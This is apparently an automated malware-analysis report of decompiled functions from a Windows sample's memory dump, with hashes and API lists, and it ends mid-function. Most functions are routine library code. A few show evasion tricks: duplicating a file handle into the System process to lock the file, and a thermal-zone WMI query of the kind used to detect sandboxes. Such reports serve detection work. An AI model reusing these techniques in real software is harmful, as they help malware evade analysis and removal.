Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageParentSend$H_prolog3
String ID:
API String ID: 1482283565-0
Opcode ID: 2211d8f9d8ff79b42f5bdfe452ea4d4cb020e02a9e9dee4a07ccbd1af5b41bcd
Instruction ID: 3a1bbd03de1dc19efc4dfeace99694c1fd80ee446ee2c3e315459b0a2db6c67e
Opcode Fuzzy Hash: 2211d8f9d8ff79b42f5bdfe452ea4d4cb020e02a9e9dee4a07ccbd1af5b41bcd
Instruction Fuzzy Hash: BD318E71D00229ABCB05EFA2CC45EEEB774BF44358B10422EF521771E1DB78A950CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040D7F3, Relevance: 7.6, APIs: 5, Instructions: 75
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040D7F3(signed int __ebx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t25;
				signed int _t30;
				void* _t32;
				signed int _t34;
				signed int _t42;
				void* _t43;
				void* _t44;
				char** _t54;
				void* _t55;
				void* _t58;
				char* _t59;
				void* _t61;

				_t42 = __ebx;
				_t59 = _t61 - 0x104;
				_t25 =  *0x44f5d0; // 0x8e7de579
				_t59[0x108] = _t25 ^ _t59;
				_push(0x18);
				E0042720D(E00439B5D, __ebx, __edi, __esi);
				_t54 = _t59[0x118];
				_t44 = _t59[0x114];
				_t52 = _t59 - 0x18;
				 *(_t59 - 0x20) = _t44;
				 *(_t59 - 0x1c) = _t54;
				_t30 = RegOpenKeyA(_t44,  *_t54, _t59 - 0x18);
				_t57 = _t30;
				if(_t30 == 0) {
					while(1) {
						_t34 = RegEnumKeyA( *(_t59 - 0x18), 0, _t59, 0x104);
						_t57 = _t34;
						_t66 = _t57;
						if(_t57 != 0) {
							break;
						}
						 *(_t59 - 4) =  *(_t59 - 4) & _t34;
						E00401EE0(_t42, _t59, _t59);
						 *(_t59 - 4) = 1;
						_t57 = E0040D7F3(_t42, _t54, _t57, _t66,  *(_t59 - 0x18), _t59 - 0x14);
						_t42 = _t42 & 0xffffff00 | _t57 != 0x00000000;
						 *(_t59 - 4) = 0;
						E00401E60( *((intOrPtr*)(_t59 - 0x14)) + 0xfffffff0, _t52);
						if(_t42 == 0) {
							 *(_t59 - 4) =  *(_t59 - 4) | 0xffffffff;
							continue;
						}
						break;
					}
					__eflags = _t57 - 0x103;
					if(_t57 == 0x103) {
						L6:
						_t57 = RegDeleteKeyA( *(_t59 - 0x20),  *_t54);
					} else {
						__eflags = _t57 - 0x3f2;
						if(_t57 == 0x3f2) {
							goto L6;
						}
					}
					RegCloseKey( *(_t59 - 0x18));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t59 - 0xc));
				_pop(_t55);
				_pop(_t58);
				_pop(_t43);
				_t32 = E0042569C(_t57, _t43, _t59[0x108] ^ _t59, _t52, _t55, _t58);
				__eflags =  &(_t59[0x10c]);
				return _t32;
			}

APIs

__EH_prolog3_catch.LIBCMT ref: 0040D812
RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 0040D831
RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 0040D84F
RegDeleteKeyA.ADVAPI32(?,?), ref: 0040D8CA
RegCloseKey.ADVAPI32(?), ref: 0040D8D5

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseDeleteEnumH_prolog3_catchOpen
String ID:
API String ID: 3522057324-0
Opcode ID: cb37df16e1151fe7b3ca810dce6b8c2972d4e7736cff12257cd2ee069f27ab6f
Instruction ID: 76f2a7b93e2c1dc243c85d088a585c4e75851b929d9529e485351bd3b216e472
Opcode Fuzzy Hash: cb37df16e1151fe7b3ca810dce6b8c2972d4e7736cff12257cd2ee069f27ab6f
Instruction Fuzzy Hash: 3F218D76D00219DBDB25EFA4D8416EEB7B4EB08314F10413AE961B72D0DB745E489BA8

Uniqueness

Uniqueness Score: -1.00%

Function 100011E4, Relevance: 7.6, APIs: 5, Instructions: 66
memoryCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E100011E4(void* __ecx, void* __eflags, signed int __fp0, int _a4) {
				signed int _v8;
				intOrPtr _v12;
				signed int _t12;
				signed int _t13;
				signed int _t15;
				int _t16;
				void* _t23;
				int _t25;
				long _t33;
				void* _t35;
				signed long long* _t37;

				_push(__ecx);
				_push(__ecx);
				_t35 = __ecx;
				_t12 = E1000112E(__ecx);
				_t25 = _a4;
				if(_t25 < _t12) {
					L2:
					_t13 = 0;
					L8:
					return _t13;
				}
				_v8 = _v8 & 0x00000000;
				_v12 = _t25;
				asm("fild qword [ebp-0x8]");
				 *_t37 = __fp0 *  *0x1001b3d0;
				__imp__ceil(_t25, _t25);
				L100158A0();
				_t33 = _t12 << 0xa;
				if(_t33 >= E1000112A(__ecx)) {
					_t15 = VirtualAlloc(0, _t33, 0x1000, 4);
					_t23 = _t15;
					if(_t23 != 0) {
						_t16 = E1000112E(_t35);
						_a4 = _t16;
						if(_t16 > 0) {
							memcpy(_t23,  *(_t35 + 4), _t16);
						}
						VirtualFree( *(_t35 + 4), 0, 0x8000);
						 *(_t35 + 4) = _t23;
						 *(_t35 + 0xc) = _t33;
						 *((intOrPtr*)(_t35 + 8)) = _t23 + _a4;
						_t13 = _t33;
					} else {
						_t13 = _t15 | 0xffffffff;
					}
					goto L8;
				}
				goto L2;
			}

0x100011e7
0x100011e8
0x100011ec
0x100011ee
0x100011f3
0x100011f8
0x1000122c
0x1000122c
0x10001286
0x1000128a
0x1000128a
0x100011fa
0x100011fe
0x10001201
0x1000120c
0x1000120f
0x10001217
0x10001220
0x1000122a
0x1000123a
0x10001240
0x10001244
0x1000124d
0x10001254
0x10001257
0x1000125e
0x10001263
0x10001270
0x10001279
0x1000127e
0x10001281
0x10001284
0x10001246
0x10001246
0x10001246
0x00000000
0x10001244
0x00000000

APIs

ceil.MSVCRT ref: 1000120F
_ftol.MSVCRT ref: 10001217
VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00000000,?,?,?,10001A31,00000003), ref: 1000123A
memcpy.MSVCRT ref: 1000125E
VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,10001A31,00000003), ref: 10001270

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: Virtual$AllocFree_ftolceilmemcpy
String ID:
API String ID: 3927456183-0
Opcode ID: 9af9fe18d0e79abd0064ec26624def8b716138394e9580c0efc37a9ec0709898
Instruction ID: f8023d6e70b3f9dc189cfde3ad749916798b2f605944e4bd1f17ff04b109bac4
Opcode Fuzzy Hash: 9af9fe18d0e79abd0064ec26624def8b716138394e9580c0efc37a9ec0709898
Instruction Fuzzy Hash: CD11E775700600FBF7249F65DC46B8EBAE8EF447D0F10842EF505D6280EB74E8148760

Uniqueness

Uniqueness Score: -1.00%

Function 1000113E, Relevance: 7.6, APIs: 5, Instructions: 65
memoryCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E1000113E(void* __ecx, signed int __fp0, int _a4) {
				signed int _v8;
				intOrPtr _v12;
				signed int _t12;
				signed int _t13;
				int _t14;
				void* _t15;
				signed int _t18;
				void* _t22;
				int _t25;
				long _t31;
				void* _t34;
				signed long long* _t36;

				_push(__ecx);
				_push(__ecx);
				_t34 = __ecx;
				_t12 = E1000112A(__ecx);
				_t25 = _a4;
				if(_t25 >= _t12) {
					_v8 = _v8 & 0x00000000;
					_v12 = _t25;
					asm("fild qword [ebp-0x8]");
					 *_t36 = __fp0 *  *0x1001b3d0;
					__imp__ceil(_t25, _t25);
					L100158A0();
					_t31 = _t12 << 0xa;
					_t13 = VirtualAlloc(0, _t31, 0x1000, 4);
					_t22 = _t13;
					if(_t22 != 0) {
						_t14 = E1000112E(_t34);
						_a4 = _t14;
						if(_t14 > 0) {
							memcpy(_t22,  *(_t34 + 4), _t14);
						}
						_t15 =  *(_t34 + 4);
						if(_t15 != 0) {
							VirtualFree(_t15, 0, 0x8000);
						}
						 *(_t34 + 4) = _t22;
						 *(_t34 + 0xc) = _t31;
						 *((intOrPtr*)(_t34 + 8)) = _t22 + _a4;
						_t18 = _t31;
					} else {
						_t18 = _t13 | 0xffffffff;
					}
				} else {
					_t18 = 0;
				}
				return _t18;
			}

0x10001141
0x10001142
0x10001146
0x10001148
0x1000114d
0x10001152
0x1000115b
0x1000115f
0x10001162
0x1000116d
0x10001170
0x10001178
0x10001181
0x1000118c
0x10001192
0x10001196
0x1000119f
0x100011a6
0x100011a9
0x100011b0
0x100011b5
0x100011b8
0x100011bd
0x100011c7
0x100011c7
0x100011d0
0x100011d5
0x100011d8
0x100011db
0x10001198
0x10001198
0x10001198
0x10001154
0x10001154
0x10001154
0x100011e1

APIs

ceil.MSVCRT ref: 10001170
_ftol.MSVCRT ref: 10001178
VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00000000,?,?,?,10001C9E,?,00000003,?,?), ref: 1000118C

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: AllocVirtual_ftolceil
String ID:
API String ID: 3317677364-0
Opcode ID: 1a10d78c7cdac06fce32bd505fb220aa817783c2829688e524df587ac8daa170
Instruction ID: f917fb053626b131b37cb72f0be2cf84f1a4599c6fe46c01a572893a921a53d8
Opcode Fuzzy Hash: 1a10d78c7cdac06fce32bd505fb220aa817783c2829688e524df587ac8daa170
Instruction Fuzzy Hash: 8811A375700704EBF7189F65DC85BDABBE8EB847D1F10852EFA15D6280EBB4E8048760

Uniqueness

Uniqueness Score: -1.00%

Function 00421B1A, Relevance: 7.6, APIs: 5, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00421B1A(intOrPtr* __ecx, int* _a4) {
				int _v8;
				int _t12;
				int _t14;
				int _t22;
				int _t32;
				int* _t36;

				_push(__ecx);
				_t35 = __ecx;
				if(__ecx == 0) {
					_t22 =  *0x4527f8; // 0x60
					_t12 =  *0x4527fc; // 0x60
					goto L6;
				} else {
					_t32 = GetMapMode( *(__ecx + 8));
					if(_t32 >= 7 || _t32 == 1) {
						_t22 = GetDeviceCaps( *(_t35 + 8), 0x58);
						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
						L6:
						_t36 = _a4;
						_v8 = _t12;
						 *_t36 = MulDiv( *_t36, 0x9ec, _t22);
						_t14 = MulDiv(_t36[1], 0x9ec, _v8);
						_t36[1] = _t14;
					} else {
						_push(3);
						 *((intOrPtr*)( *__ecx + 0x34))();
						E00413F6B(__ecx, _a4);
						_push(_t32);
						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
					}
				}
				return _t14;
			}

APIs

GetMapMode.GDI32(?,?,?,?,?,?,0041A93D,?,00000000,0000001C,0041B2AB,?,?,?,?,?), ref: 00421B2A
GetDeviceCaps.GDI32(?,00000058), ref: 00421B64
GetDeviceCaps.GDI32(?,0000005A), ref: 00421B6D

Part of subcall function 00413F6B: MulDiv.KERNEL32(?,00000000,00000000), ref: 00413FAB
Part of subcall function 00413F6B: MulDiv.KERNEL32(?,00000000,00000000), ref: 00413FC8

MulDiv.KERNEL32(?,000009EC,00000060), ref: 00421B91
MulDiv.KERNEL32(00000000,000009EC,?), ref: 00421B9C

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsDevice$Mode
String ID:
API String ID: 696222070-0
Opcode ID: cd3d206cccf7f43f11e33ef7c66f41ff2f55226f59790240a23694a545a543c4
Instruction ID: 6a8568c6f472b5ba2f36c124c634809e7b624eafdddc9d412788081ab557a752
Opcode Fuzzy Hash: cd3d206cccf7f43f11e33ef7c66f41ff2f55226f59790240a23694a545a543c4
Instruction Fuzzy Hash: 6B11E032700614AFCB21AF59DC44C1EBBB9EF98751B11442AF94257330D775AC028F54

Uniqueness

Uniqueness Score: -1.00%

Function 00421BA8, Relevance: 7.6, APIs: 5, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00421BA8(intOrPtr* __ecx, int* _a4) {
				int _v8;
				int _t12;
				int _t14;
				int _t30;
				int _t33;
				int* _t36;

				_push(__ecx);
				_t35 = __ecx;
				if(__ecx == 0) {
					_t30 =  *0x4527f8; // 0x60
					_t12 =  *0x4527fc; // 0x60
					goto L6;
				} else {
					_t33 = GetMapMode( *(__ecx + 8));
					if(_t33 >= 7 || _t33 == 1) {
						_t30 = GetDeviceCaps( *(_t35 + 8), 0x58);
						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
						L6:
						_t36 = _a4;
						_v8 = _t12;
						 *_t36 = MulDiv( *_t36, _t30, 0x9ec);
						_t14 = MulDiv(_t36[1], _v8, 0x9ec);
						_t36[1] = _t14;
					} else {
						_push(3);
						 *((intOrPtr*)( *__ecx + 0x34))();
						E00413F02(__ecx, _a4);
						_push(_t33);
						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
					}
				}
				return _t14;
			}

APIs

GetMapMode.GDI32(?,00000000,?,?,?,?,0041A981,?,?,?,?,?,?), ref: 00421BB8
GetDeviceCaps.GDI32(?,00000058), ref: 00421BF2
GetDeviceCaps.GDI32(?,0000005A), ref: 00421BFB

Part of subcall function 00413F02: MulDiv.KERNEL32(?,00000000,00000000), ref: 00413F42
Part of subcall function 00413F02: MulDiv.KERNEL32(?,00000000,00000000), ref: 00413F5F

MulDiv.KERNEL32(?,00000060,000009EC), ref: 00421C1F
MulDiv.KERNEL32(00000000,?,000009EC), ref: 00421C2A

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsDevice$Mode
String ID:
API String ID: 696222070-0
Opcode ID: fcd423b0ab48d22ff24563ae87f92f7aac0099137693f9d545045a3a3275e3ae
Instruction ID: 44575178ca76063926b680eaeb6e0f8933480824aa1c9693c9f482a1f2d1aa15
Opcode Fuzzy Hash: fcd423b0ab48d22ff24563ae87f92f7aac0099137693f9d545045a3a3275e3ae
Instruction Fuzzy Hash: AD11E035600610AFCB21AF55DC44C1EBBBAEF99710B11442AFA8157360C775EC01DB98

Uniqueness

Uniqueness Score: -1.00%

Function 1000C410, Relevance: 7.6, APIs: 5, Instructions: 54
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000C410(void* _a4) {
				void* _t14;
				void* _t15;
				struct HINSTANCE__* _t20;
				intOrPtr _t22;
				signed int _t30;
				void* _t32;

				_t32 = _a4;
				if(_t32 != 0) {
					if( *((intOrPtr*)(_t32 + 0x10)) != 0) {
						_t3 = _t32 + 4; // 0x10778905
						_t22 =  *_t3;
						 *((intOrPtr*)( *((intOrPtr*)( *_t32 + 0x28)) + _t22))(_t22, 0, 0);
						 *((intOrPtr*)(_t32 + 0x10)) = 0;
					}
					if( *(_t32 + 8) == 0) {
						L9:
						_t13 = _t32 + 4; // 0x10778905
						_t15 =  *_t13;
						if(_t15 != 0) {
							VirtualFree(_t15, 0, 0x8000);
						}
						return HeapFree(GetProcessHeap(), 0, _t32);
					} else {
						_t30 = 0;
						if( *((intOrPtr*)(_t32 + 0xc)) <= 0) {
							L8:
							_t12 = _t32 + 8; // 0x5e5fc78b
							free( *_t12);
							goto L9;
						} else {
							goto L5;
						}
						do {
							L5:
							_t8 = _t32 + 8; // 0x5e5fc78b
							_t20 =  *( *_t8 + _t30 * 4);
							if(_t20 != 0xffffffff) {
								FreeLibrary(_t20);
							}
							_t30 = _t30 + 1;
							_t11 = _t32 + 0xc; // 0x55c3c95b
						} while (_t30 <  *_t11);
						goto L8;
					}
				}
				return _t14;
			}

0x1000c415
0x1000c41c
0x1000c421
0x1000c425
0x1000c425
0x1000c430
0x1000c432
0x1000c432
0x1000c438
0x1000c465
0x1000c465
0x1000c465
0x1000c46a
0x1000c473
0x1000c473
0x00000000
0x1000c43a
0x1000c43b
0x1000c440
0x1000c45a
0x1000c45a
0x1000c45d
0x00000000
0x00000000
0x00000000
0x00000000
0x1000c442
0x1000c442
0x1000c442
0x1000c445
0x1000c44b
0x1000c44e
0x1000c44e
0x1000c454
0x1000c455
0x1000c455
0x00000000
0x1000c442
0x1000c438
0x1000c48b

APIs

FreeLibrary.KERNEL32(?,00000000,?,00000000,?,1000C062,00000000), ref: 1000C44E
free.MSVCRT(5E5FC78B,00000000,?,00000000,?,1000C062,00000000), ref: 1000C45D
VirtualFree.KERNEL32(10778905,00000000,00008000,?,00000000,?,1000C062,00000000), ref: 1000C473
GetProcessHeap.KERNEL32(00000000,1000C062,?,00000000,?,1000C062,00000000), ref: 1000C47B
HeapFree.KERNEL32(00000000,?,1000C062,00000000), ref: 1000C482

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: Free$Heap$LibraryProcessVirtualfree
String ID:
API String ID: 831075735-0
Opcode ID: 7043ddf93816c16594f9533c0eeb211d1a323e86353bddf1d2eb7dffc1de9550
Instruction ID: ce48dea8667dbe88799da578b07a9c47ba1b6aa702d82e5a87ef372fa66e5504
Opcode Fuzzy Hash: 7043ddf93816c16594f9533c0eeb211d1a323e86353bddf1d2eb7dffc1de9550
Instruction Fuzzy Hash: 0F010972500B15AFE7208FA9CCD8C67B7E8FB482A5351892DF16A82551CB30EC458B50

Uniqueness

Uniqueness Score: -1.00%

Function 00416AB0, Relevance: 7.6, APIs: 5, Instructions: 53
stringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00416AB0(void* __ecx, intOrPtr __edx, struct HWND__* _a4, CHAR* _a8) {
				signed int _v8;
				char _v263;
				char _v264;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t9;
				struct HWND__* _t21;
				void* _t22;
				intOrPtr _t25;
				int _t26;
				CHAR* _t27;
				signed int _t28;

				_t25 = __edx;
				_t22 = __ecx;
				_t9 =  *0x44f5d0; // 0x8e7de579
				_v8 = _t9 ^ _t28;
				_t21 = _a4;
				_t27 = _a8;
				if(_t21 == 0) {
					L1:
					E00415838(_t22);
				}
				if(_t27 == 0) {
					goto L1;
				}
				_t26 = lstrlenA(_t27);
				_v264 = 0;
				E004277B0(_t26,  &_v263, 0, 0xff);
				if(_t26 > 0x100 || GetWindowTextA(_t21,  &_v264, 0x100) != _t26 || lstrcmpA( &_v264, _t27) != 0) {
					_t16 = SetWindowTextA(_t21, _t27);
				}
				return E0042569C(_t16, _t21, _v8 ^ _t28, _t25, _t26, _t27);
			}

APIs

lstrlenA.KERNEL32(?), ref: 00416ADA
_memset.LIBCMT ref: 00416AF7
GetWindowTextA.USER32 ref: 00416B11
lstrcmpA.KERNEL32(00000000,?), ref: 00416B23
SetWindowTextA.USER32(?,?), ref: 00416B2F

Part of subcall function 00415838: __CxxThrowException@8.LIBCMT ref: 0041584C

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: TextWindow$Exception@8Throw_memsetlstrcmplstrlen
String ID:
API String ID: 289641511-0
Opcode ID: 7314dc9b8a181e9f1d25e401592f3e5efe5aff880111fa835fc632f8ba00b0b3
Instruction ID: 9ab904172df34d6c31fc328be64f6b40931c15da500513f4f743aa110a11791f
Opcode Fuzzy Hash: 7314dc9b8a181e9f1d25e401592f3e5efe5aff880111fa835fc632f8ba00b0b3
Instruction Fuzzy Hash: 9001C8B2A0112867D711AF64AC84FDF77ACEF15340F00407AF945D3141DA74ED8487A8

Uniqueness

Uniqueness Score: -1.00%

Function 10019E02, Relevance: 7.5, APIs: 5, Instructions: 45
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E10019E02(void* __ecx, CHAR* _a4) {
				void* _v12;
				int _t11;
				signed int _t13;
				void* _t16;
				short* _t17;
				int _t19;
				short* _t21;

				_t16 = __ecx;
				if(_a4 != 0) {
					_t19 = lstrlenA(_a4) + 1;
					E100158E0(_t19 + _t19 + 0x00000003 & 0x000000fc, _t16);
					_t17 = _t21;
					 *_t17 =  *_t17 & 0x00000000;
					_t11 = MultiByteToWideChar(0, 0, _a4, 0xffffffff, _t17, _t19);
					if(_t11 == 0) {
						if(GetLastError() == 0) {
							_t13 = 0;
						} else {
							_t13 = GetLastError() & 0x0000ffff | 0x80070000;
						}
						_t11 = E10019DB6(_t13);
					}
					__imp__#2(_t17);
				} else {
					_t11 = 0;
				}
				return _t11;
			}

0x10019e02
0x10019e0b
0x10019e1c
0x10019e25
0x10019e2a
0x10019e33
0x10019e3b
0x10019e43
0x10019e4f
0x10019e5f
0x10019e51
0x10019e58
0x10019e58
0x10019e62
0x10019e62
0x10019e68
0x10019e0d
0x10019e0d
0x10019e0d
0x10019e74

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,?,10003B87,00000000,?,?,10003ACA,?,00000000,?,10002045,SELECT * FROM MSAcpi_ThermalZoneTemperature), ref: 10019E14
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000001,?,10003B87,00000000,?,?,10003ACA,?,00000000,?,10002045), ref: 10019E3B
GetLastError.KERNEL32(?,00000001,?,10003B87,00000000,?,?,10003ACA,?,00000000,?,10002045,SELECT * FROM MSAcpi_ThermalZoneTemperature), ref: 10019E4B
GetLastError.KERNEL32(?,00000001,?,10003B87,00000000,?,?,10003ACA,?,00000000,?,10002045,SELECT * FROM MSAcpi_ThermalZoneTemperature), ref: 10019E51
SysAllocString.OLEAUT32 ref: 10019E68

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: ErrorLast$AllocByteCharMultiStringWidelstrlen
String ID:
API String ID: 4196186757-0
Opcode ID: ee0c74719f753634bfcc5d51646ff9a7e6428a476bdb4e722221b88b49b558aa
Instruction ID: a6ad84bd6c305c6333f726987d047d992e2155a73d1f6186eddac48e277c428b
Opcode Fuzzy Hash: ee0c74719f753634bfcc5d51646ff9a7e6428a476bdb4e722221b88b49b558aa
Instruction Fuzzy Hash: F601FF3250062AE6EB21DB21CC45BAF3FE8EF027A1F214430F810DA0A0E734E5A196E0

Uniqueness

Uniqueness Score: -1.00%

Function 10001EE6, Relevance: 7.5, APIs: 5, Instructions: 44
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10001EE6(void* __ecx, CHAR* _a4) {
				void* _v8;
				void* _t5;
				int _t7;
				void* _t13;
				int _t16;

				E10001E41();
				_t16 = 0;
				_t13 = OpenProcess(0x40, 0, 4);
				if(_t13 != 0) {
					_t5 = CreateFileA(_a4, 0x80000000, 0, 0, 3, 0x80, 0);
					if(_t5 != 0xffffffff) {
						_t16 = DuplicateHandle(GetCurrentProcess(), _t5, _t13,  &_v8, 0, 0, 3);
					}
					CloseHandle(_t13);
					_t7 = _t16;
				} else {
					_t7 = 0;
				}
				return _t7;
			}

0x10001eec
0x10001ef1
0x10001efe
0x10001f02
0x10001f1a
0x10001f23
0x10001f3c
0x10001f3c
0x10001f3f
0x10001f45
0x10001f04
0x10001f04
0x10001f04
0x10001f4a

APIs

Part of subcall function 10001E41: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,1000BD78), ref: 10001E47
Part of subcall function 10001E41: OpenProcessToken.ADVAPI32(00000000,00000028,1000BD78,?,?,?,?,?,?,?,?,?,1000BD78), ref: 10001E54
Part of subcall function 10001E41: LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 10001EB1
Part of subcall function 10001E41: AdjustTokenPrivileges.KERNELBASE(1000BD78,00000000,?,00000000,00000000,00000000), ref: 10001ED4
Part of subcall function 10001E41: FindCloseChangeNotification.KERNELBASE(1000BD78), ref: 10001EDD

OpenProcess.KERNEL32(00000040,00000000,00000004,00000104,00000000,?,?,1000BA60,?), ref: 10001EF8
CreateFileA.KERNEL32(1000BA60,80000000,00000000,00000000,00000003,00000080,00000000,?,?,1000BA60,?), ref: 10001F1A
GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000,00000000,00000003,?,?,1000BA60,?), ref: 10001F2F
DuplicateHandle.KERNEL32(00000000,?,?,1000BA60,?), ref: 10001F36
CloseHandle.KERNEL32(00000000,?,?,1000BA60,?), ref: 10001F3F

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: Process$CloseCurrentHandleOpenToken$AdjustChangeCreateDuplicateFileFindLookupNotificationPrivilegePrivilegesValue
String ID:
API String ID: 92218700-0
Opcode ID: ce2bd1a37ca86c8825e91e5de3a6ec0fb8aaf2087936b99cce8184977eab7a4c
Instruction ID: 46502f69fef428b108ee33c82a488ce0ae5e04652329207c147da49c6d6b9158
Opcode Fuzzy Hash: ce2bd1a37ca86c8825e91e5de3a6ec0fb8aaf2087936b99cce8184977eab7a4c
Instruction Fuzzy Hash: 95F01D71601230BBE63157618C4EFAB3E5CEF86AF1F200214FA0AE2190D7605A45D6A0

Uniqueness

Uniqueness Score: -1.00%

Function 00426256, Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E00426256(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t24;
				void* _t26;

				_push(0xc);
				_push(0x44a730);
				_t8 = E00428FAC(__ebx, __edi, __esi);
				_t24 =  *((intOrPtr*)(_t26 + 8));
				if(_t24 == 0) {
					L9:
					return E00428FF1(_t8);
				}
				if( *0x454918 != 3) {
					_push(_t24);
					L7:
					_t8 = HeapFree( *0x452f40, 0, ??);
					_t32 = _t8;
					if(_t8 == 0) {
						_t10 = E00427761(_t32);
						 *_t10 = E00427726(GetLastError());
					}
					goto L9;
				}
				E0042E21D(__ebx, __edi, 4);
